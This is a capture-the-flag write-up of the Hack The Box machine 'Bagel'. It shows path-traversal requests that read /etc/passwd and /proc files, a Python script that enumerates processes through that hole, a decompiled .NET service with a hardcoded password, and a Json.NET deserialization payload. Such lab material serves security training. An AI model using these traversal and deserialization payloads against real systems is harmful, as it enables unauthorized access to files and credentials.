# Bagel - HTB

[[_TOC_]]

## Summary

<!-- markdownlint-disable MD033 -->
<div align="center"><img width="560" height="424" src="images/0.png"></div>

Bagel was a nice medium-rated HTB machine created by [CestLaVie](https://app.hackthebox.com/users/298338)

It starts with a local file read vulnerability and involves enumerating the `/proc` pseudo filesystem.  
For user, we are expected to exploit a `dotnet` deserialization.  
A `dotnet` entry in `/etc/sudoers` needs to be exploited for root.

## Initial recon

```console
opcode@parrot$ nmap -v -p- 10.10.11.201
Host is up (0.083s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp
8000/tcp open  http-alt
```

```console
opcode@parrot$ nmap -sC -sV -p 22,5000,8000 -oN bagel.nmap 10.10.11.201
Nmap scan report for 10.10.11.201
Host is up (0.084s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.8 (protocol 2.0)
| ssh-hostkey: 
|   256 6e:4e:13:41:f2:fe:d9:e0:f7:27:5b:ed:ed:cc:68:c2 (ECDSA)
|_  256 80:a7:cd:10:e7:2f:db:95:8b:86:9b:1b:20:65:2a:98 (ED25519)
5000/tcp open  upnp?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 400 Bad Request
|     Server: Microsoft-NetCore/2.0
|     Date: Thu, 16 Mar 2023 05:25:38 GMT
|     Connection: close
|   HTTPOptions: 
|     HTTP/1.1 400 Bad Request
|     Server: Microsoft-NetCore/2.0
|     Date: Thu, 16 Mar 2023 05:25:53 GMT
|     Connection: close
|   Help, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/html
|     Server: Microsoft-NetCore/2.0
|     Date: Thu, 16 Mar 2023 05:26:04 GMT
|     Content-Length: 52
|     Connection: close
|     Keep-Alive: true
|     <h1>Bad Request (Invalid request line (parts).)</h1>
|   RTSPRequest: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/html
|     Server: Microsoft-NetCore/2.0
|     Date: Thu, 16 Mar 2023 05:25:38 GMT
|     Content-Length: 54
|     Connection: close
|     Keep-Alive: true
|_    <h1>Bad Request (Invalid request line (version).)</h1>
8000/tcp open  http-alt Werkzeug/2.2.2 Python/3.10.9
|_http-server-header: Werkzeug/2.2.2 Python/3.10.9
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 NOT FOUND
|     Server: Werkzeug/2.2.2 Python/3.10.9
|     Date: Thu, 16 Mar 2023 05:25:38 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 207
|     Connection: close
|     <!doctype html>
|     <html lang=en>
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest: 
|     HTTP/1.1 302 FOUND
|     Server: Werkzeug/2.2.2 Python/3.10.9
|     Date: Thu, 16 Mar 2023 05:25:33 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 263
|     Location: http://bagel.htb:8000/?page=index.html
|     Connection: close
|     <!doctype html>
|     <html lang=en>
|     <title>Redirecting...</title>
|     <h1>Redirecting...</h1>
|     <p>You should be redirected automatically to the target URL: <a href="http://bagel.htb:8000/?page=index.html">http://bagel.htb:8000/?page=index.html</a>. If not, click the link.
|   Socks5: 
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request syntax ('
|     ').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
|_http-title: Did not follow redirect to http://bagel.htb:8000/?page=index.html
```

Besides the usual SSH (22) port, we also have ports 5000 and 8000.  
For the service on port 5000, `nmap` shows the header `Server: Microsoft-NetCore/2.0`.  
Port 8000 seems to be a python web server.

Upon visiting the website on port 8000, we'd be redirected to <http://bagel.htb:8000/?page=index.html>  
Hence, we can add this line to `/etc/hosts`:

```text
10.10.11.201 bagel.htb
```

The website loads now:

![1](images/1.png)

The only functional link is `/orders`  
Visiting <http://bagel.htb:8000/orders> returns:

```text
order #1 address: NY. 99 Wall St., client name: P.Morgan, details: [20 chocko-bagels]
order #2 address: Berlin. 339 Landsberger.A., client name: J.Smith, details: [50 bagels]
order #3 address: Warsaw. 437 Radomska., client name: A.Kowalska, details: [93 bel-bagels]
```

I tried to enumerate subdomains with `ffuf`, but found nothing.

## Local File Read

The homepage was at <http://bagel.htb:8000/?page=index.html>. This pattern calls for some testing.

We can learn that there's a straightforward LFR here:

```console
opcode@parrot$ curl -s 'http://bagel.htb:8000/?page=../../../../etc/passwd'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
[--SNIP--]
tcpdump:x:72:72::/:/sbin/nologin
systemd-coredump:x:989:989:systemd Core Dumper:/:/usr/sbin/nologin
systemd-timesync:x:988:988:systemd Time Synchronization:/:/usr/sbin/nologin
developer:x:1000:1000::/home/developer:/bin/bash
phil:x:1001:1001::/home/phil:/bin/bash
_laurel:x:987:987::/var/log/laurel:/bin/false
```

I couldn't find the `apache` or `nginx` configurations, but `proc` filesystem worked.

```console
opcode@parrot$ curl -s 'http://bagel.htb:8000/?page=../../../../proc/self/cmdline' | sed -e 's/\x00/ /g'
python3 /home/developer/app/app.py
```

We can also look at environment variables through `proc`:

```console
curl -s 'http://bagel.htb:8000/?page=../../../../proc/self/environ' | sed -e 's/\x00/\n/g'
LANG=en_US.UTF-8
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
HOME=/home/developer
LOGNAME=developer
USER=developer
SHELL=/bin/bash
INVOCATION_ID=e69cff5678e241dfb3265c1ec6505954
JOURNAL_STREAM=8:22427
SYSTEMD_EXEC_PID=888
```

The flask service is running as the user `developer`, but this user doesn't have a flag or `id_rsa`.

We can take a look at the source code for this flask application:

```console
opcode@parrot$ curl 'http://bagel.htb:8000/?page=../../../../home/developer/app/app.py'
```

We get:

```py
from flask import Flask, request, send_file, redirect, Response
import os.path
import websocket,json

app = Flask(__name__)

@app.route('/')
def index():
        if 'page' in request.args:
            page = 'static/'+request.args.get('page')
            if os.path.isfile(page):
                resp=send_file(page)
                resp.direct_passthrough = False
                if os.path.getsize(page) == 0:
                    resp.headers["Content-Length"]=str(len(resp.get_data()))
                return resp
            else:
                return "File not found"
        else:
                return redirect('http://bagel.htb:8000/?page=index.html', code=302)

@app.route('/orders')
def order(): # don't forget to run the order app first with "dotnet <path to .dll>" command. Use your ssh key to access the machine.
    try:
        ws = websocket.WebSocket()    
        ws.connect("ws://127.0.0.1:5000/") # connect to order app
        order = {"ReadOrder":"orders.txt"}
        data = str(json.dumps(order))
        ws.send(data)
        result = ws.recv()
        return(json.loads(result)['ReadOrder'])
    except:
        return("Unable to connect")

if __name__ == '__main__':
  app.run(host='0.0.0.0', port=8000)
```

This flask application is simply a middleman between a websocket on port 5000 and us.  
That one line of comment has couple of hints: the user `phil` likely has an `id_rsa`, and the service on port 5000 is a `dotnet` application.

## Interacting with websocket

Now that we've learnt about the nature of port 5000, we can interact with it.  
As usual, I wrote a JS script using the `ws` library:

```js
const WebSocket = require("ws");
const prompt = require("prompt-sync")({ sigint: true });

async function main() {
  const socket = new WebSocket("ws://bagel.htb:5000");

  await new Promise((resolve) => {
    socket.on('open', resolve);
  });

  while (true) {
    let userInput = prompt(">> ");
    let payload = JSON.stringify({ ReadOrder: userInput });
    socket.send(payload);

    const response = await new Promise((resolve) => {
      socket.on('message', resolve);
    });

    console.log(`Response: ${response}`);
  }
}

main();
```

I then installed the libraries:

```console
opcode@parrot$ cd /tmp
opcode@parrot$ npm install ws
opcode@parrot$ npm install prompt-sync
```

I was able to read `orders.txt`, but nothing else.

```console
opcode@parrot$ node sock.js  
>> orders.txt
Response: {
  "UserId": 0,
  "Session": "Unauthorized",
  "Time": "3:48:33",
  "RemoveOrder": null,
  "WriteOrder": null,
  "ReadOrder": "order #1 address: NY. 99 Wall St., client name: P.Morgan, details: [20 chocko-bagels]\norder #2 address: Berlin. 339 Landsberger.A., client name: J.Smith, details: [50 bagels]\norder #3 address: Warsaw. 437 Radomska., client name: A.Kowalska, details: [93 bel-bagels] \n"
}
```

I tried a bunch of LFR payloads, but nothing worked.

## `proc` PID enumeration

Whenever we get LFR, the next step is to enumerate all `/proc/pid/cmdline` files and look for more hints.

To do that effortlessly, I have a python script prepared, [proc_pid_enum.py](proc_pid_enum.py):

```py
import requests
from json import dumps
from concurrent.futures import ThreadPoolExecutor


def get_contents(path):
    r = requests.get(f"{url}/?page=../../../..{path}", proxies=proxy)

    if r.headers.get("content-length") != "0":
        return r.content
    else:
        return b"File not found"


def get_cmdlines(pid):
    cmdline = get_contents(f"/proc/{pid}/cmdline")
    cmdline = cmdline.replace(b"\x00", b" ").decode()
    if cmdline != "File not found":
        cmdlines[pid] = cmdline
        print(f"{pid}: {cmdlines[pid]}")


if __name__ == "__main__":
    proxy = {}
    # proxy['http'] = 'http://127.0.0.1:8080'

    url = "http://bagel.htb:8000"

    cmdlines = {}

    with ThreadPoolExecutor(max_workers=20) as executor:
        futures = [executor.submit(get_cmdlines, pid) for pid in range(2000)]

    with open("cmdlines.json", "w") as f:
        f.write(dumps(cmdlines))
```

I like resetting the box before running this script so we don't have to search for higher PIDs.  
After running the script, it finds:

```json
{
  "1": "/usr/lib/systemd/systemd rhgb --switched-root --system --deserialize 35 ",
  "758": "/usr/lib/systemd/systemd-journald ",
  "771": "/usr/lib/systemd/systemd-udevd ",
  "849": "/usr/lib/systemd/systemd-resolved ",
  "848": "/usr/lib/systemd/systemd-oomd ",
  "852": "/usr/lib/systemd/systemd-userdbd ",
  "853": "/usr/sbin/sedispatch ",
  "855": "/sbin/auditd ",
  "854": "/usr/local/sbin/laurel --config /etc/laurel/config.toml ",
  "850": "/sbin/auditd ",
  "851": "/sbin/auditd ",
  "883": "/usr/sbin/NetworkManager --no-daemon ",
  "887": "dotnet /opt/bagel/bin/Debug/net6.0/bagel.dll ",
  "892": "/usr/lib/polkit-1/polkitd --no-debug ",
  "890": "/usr/sbin/irqbalance --foreground ",
  "889": "python3 /home/developer/app/app.py ",
  "895": "/usr/sbin/rsyslogd -n ",
  "893": "/usr/sbin/rsyslogd -n ",
  "896": "/usr/lib/systemd/systemd-logind ",
  "897": "/usr/bin/VGAuthService -s ",
  "901": "/usr/sbin/abrtd -d -s ",
  "900": "/usr/sbin/chronyd -F 2 ",
  "902": "/usr/sbin/rsyslogd -n ",
  "904": "/usr/sbin/irqbalance --foreground ",
  "898": "/usr/bin/vmtoolsd ",
  "909": "/usr/bin/dbus-broker-launch --scope system --audit ",
  "921": "/usr/sbin/abrtd -d -s ",
  "919": "dotnet /opt/bagel/bin/Debug/net6.0/bagel.dll ",
  "920": "dotnet /opt/bagel/bin/Debug/net6.0/bagel.dll ",
  "924": "/usr/sbin/NetworkManager --no-daemon ",
  "923": "/usr/lib/polkit-1/polkitd --no-debug ",
  "926": "dotnet /opt/bagel/bin/Debug/net6.0/bagel.dll ",
  "925": "dotnet /opt/bagel/bin/Debug/net6.0/bagel.dll ",
  "928": "dotnet /opt/bagel/bin/Debug/net6.0/bagel.dll ",
  "929": "dotnet /opt/bagel/bin/Debug/net6.0/bagel.dll ",
  "927": "dotnet /opt/bagel/bin/Debug/net6.0/bagel.dll ",
  "931": "dbus-broker --log 4 --controller 9 --machine-id ce8a2667e5384602a9b46d6ad7614e92 --max-bytes 536870912 --max-fds 4096 --max-matches 131072 --audit ",
  "932": "/usr/bin/vmtoolsd ",
  "935": "/usr/sbin/abrtd -d -s ",
  "933": "/usr/bin/vmtoolsd ",
  "936": "/usr/lib/polkit-1/polkitd --no-debug ",
  "938": "/usr/sbin/NetworkManager --no-daemon ",
  "937": "/usr/bin/vmtoolsd ",
  "941": "/usr/lib/polkit-1/polkitd --no-debug ",
  "942": "/usr/bin/abrt-dump-journal-core -D -T -f -e ",
  "946": "/usr/bin/abrt-dump-journal-xorg -fxtD ",
  "944": "/usr/bin/abrt-dump-journal-oops -fxtD ",
  "940": "/usr/lib/polkit-1/polkitd --no-debug ",
  "967": "/usr/sbin/gssproxy -D ",
  "961": "/usr/lib/polkit-1/polkitd --no-debug ",
  "956": "sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups ",
  "966": "/usr/sbin/ModemManager ",
  "968": "/usr/sbin/gssproxy -D ",
  "970": "/usr/sbin/gssproxy -D ",
  "972": "/usr/sbin/gssproxy -D ",
  "969": "/usr/sbin/gssproxy -D ",
  "971": "/usr/sbin/gssproxy -D ",
  "974": "/usr/sbin/ModemManager ",
  "977": "/usr/sbin/ModemManager ",
  "980": "/usr/sbin/ModemManager "
}
```

Out of these, the PID 887 is interesting:

```json
  "887": "dotnet /opt/bagel/bin/Debug/net6.0/bagel.dll ",
```

It should be the `dll` that was mentioned in the earlier comment.

Since we have LFR, we can download the file:

```console
opcode@parrot$ curl 'http://bagel.htb:8000/?page=../../../../opt/bagel/bin/Debug/net6.0/bagel.dll' --output bagel.dll
```

## Reversing `dll`

```console
opcode@parrot$ file bagel.dll
bagel.dll: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
```

Since it is `Mono/.Net assembly`, we can use [dotPeek](https://www.jetbrains.com/decompiler/) and check out the source.  
Inside `bagel_server` namespace, we have a bunch of classes.

`bagel_server`-->`Bagel`:

```cs
using System;
using System.Text;
using System.Threading;
using WatsonWebsocket;


#nullable enable
namespace bagel_server
{
  public class Bagel
  {
    private static string _ServerIp = "*";
    private static int _ServerPort = 5000;
    private static bool _Ssl = false;
    private static WatsonWsServer _Server = (WatsonWsServer) null;

    private static void Main(string[] args)
    {
      Bagel.InitializeServer();
      Bagel.StartServer();
      while (true)
        Thread.Sleep(1000);
    }

    private static void InitializeServer()
    {
      Bagel._Server = new WatsonWsServer(Bagel._ServerIp, Bagel._ServerPort, Bagel._Ssl);
      Bagel._Server.AcceptInvalidCertificates = true;
      Bagel._Server.MessageReceived += new EventHandler<MessageReceivedEventArgs>(Bagel.MessageReceived);
    }

    private static async void StartServer() => await Bagel._Server.StartAsync(new CancellationToken());

    private static void MessageReceived(object sender, MessageReceivedEventArgs args)
    {
      string json = "";
      ArraySegment<byte> data;
      int num;
      if (args.Data != ArraySegment<byte>.op_Implicit((byte[]) null))
      {
        data = args.Data;
        num = data.Count > 0 ? 1 : 0;
      }
      else
        num = 0;
      if (num != 0)
      {
        Encoding utF8 = Encoding.UTF8;
        data = args.Data;
        byte[] array = data.Array;
        data = args.Data;
        int count = data.Count;
        json = utF8.GetString(array, 0, count);
      }
      Handler handler = new Handler();
      object obj1 = handler.Deserialize(json);
      object obj2 = handler.Serialize(obj1);
      Bagel._Server.SendAsync(args.IpPort, obj2.ToString(), new CancellationToken());
    }
  }
}
```

This is responsible for websocket logic, I think.

`bagel_server`-->`Base`:

```cs
using System;


#nullable enable
namespace bagel_server
{
  public class Base : Orders
  {
    private int userid = 0;
    private string session = "Unauthorized";

    public int UserId
    {
      get => this.userid;
      set => this.userid = value;
    }

    public string Session
    {
      get => this.session;
      set => this.session = value;
    }

    public string Time => DateTime.Now.ToString("h:mm:ss");
  }
}
```

`bagel_server`-->`DB`:

```cs
using Microsoft.Data.SqlClient;
using System;

namespace bagel_server
{
  public class DB
  {
    [Obsolete("The production team has to decide where the database server will be hosted. This method is not fully implemented.")]
    public void DB_connection()
    {
      SqlConnection sqlConnection = new SqlConnection("Data Source=ip;Initial Catalog=Orders;User ID=dev;Password=k8wdAYYKyhnjg3K");
    }
  }
}
```

I tried using the password for SSH, but it didn't work for either user.

`bagel_server`-->`File`:

```cs
using System;
using System.IO;
using System.Text;


#nullable enable
namespace bagel_server
{
  public class File
  {
    private string file_content;
    private string IsSuccess = (string) null;
    private string directory = "/opt/bagel/orders/";
    private string filename = "orders.txt";

    public string ReadFile
    {
      set
      {
        this.filename = value;
        this.ReadContent(this.directory + this.filename);
      }
      get => this.file_content;
    }

    public void ReadContent(string path)
    {
      try
      {
        this.file_content += string.Join("\n", File.ReadLines(path, Encoding.UTF8));
      }
      catch (Exception ex)
      {
        this.file_content = "Order not found!";
      }
    }

    public string WriteFile
    {
      get => this.IsSuccess;
      set => this.WriteContent(this.directory + this.filename, value);
    }

    public void WriteContent(string filename, string line)
    {
      try
      {
        File.WriteAllText(filename, line);
        this.IsSuccess = "Operation successed";
      }
      catch (Exception ex)
      {
        this.IsSuccess = "Operation failed";
      }
    }
  }
}
```

`ReadFile` and `WriteFile` are being defined here.

`bagel_server`-->`Handler`:

```cs
using Newtonsoft.Json;


#nullable enable
namespace bagel_server
{
  public class Handler
  {
    public object Serialize(object obj) => (object) JsonConvert.SerializeObject(obj, (Formatting) 1, new JsonSerializerSettings()
    {
      TypeNameHandling = (TypeNameHandling) 4
    });

    public object Deserialize(string json)
    {
      try
      {
        return (object) JsonConvert.DeserializeObject<Base>(json, new JsonSerializerSettings()
        {
          TypeNameHandling = (TypeNameHandling) 4
        });
      }
      catch
      {
        return (object) "{\"Message\":\"unknown\"}";
      }
    }
  }
}
```

`bagel_server`-->`Orders`:

```cs
using System.Diagnostics;


#nullable enable
namespace bagel_server
{
  public class Orders
  {
    private string order_filename;
    private string order_info;
    private File file = new File();

    [field: DebuggerBrowsable]
    public object RemoveOrder { get; set; }

    public string WriteOrder
    {
      get => this.file.WriteFile;
      set
      {
        this.order_info = value;
        this.file.WriteFile = this.order_info;
      }
    }

    public string ReadOrder
    {
      get => this.file.ReadFile;
      set
      {
        this.order_filename = value;
        this.order_filename = this.order_filename.Replace("/", "");
        this.order_filename = this.order_filename.Replace("..", "");
        this.file.ReadFile = this.order_filename;
      }
    }
  }
}
```

I tried fighting the filters but got nowhere.

There is a potential deserialization vulnerability in the `Handler` class.  
I couldn't find any good resources for deserialization besides the one from [VbScrub](https://twitter.com/VbScrub):  
<https://vbscrub.com/2020/02/05/net-deserialization-exploits-explained/>

I could not get [ysoserial.net](https://github.com/pwntester/ysoserial.net) to work and failed the box.  
Now that the box has retired, we can refer to write-ups.

A bunch of JSON libraries are vulnerable to deserialization, and they are documented here: <https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf>

In our case, `using Newtonsoft.Json` implies `Json.net`, also present in that paper.  
A prerequisite for the exploit is to have `TypeNameHandling` property set to anything other than `None`.  
It is set to 4 in the `Handler` class (4 implies `Auto`).

[0xdf](https://twitter.com/0xdf_) has done an excellent job of explaining the attack in his write-up.  
His payload was:

```json
{"RemoveOrder": {"$type": "bagel_server.File, bagel", "ReadFile": "../../../../etc/passwd"}}
```

Go ahead and read his write-up; it is very well-detailed.
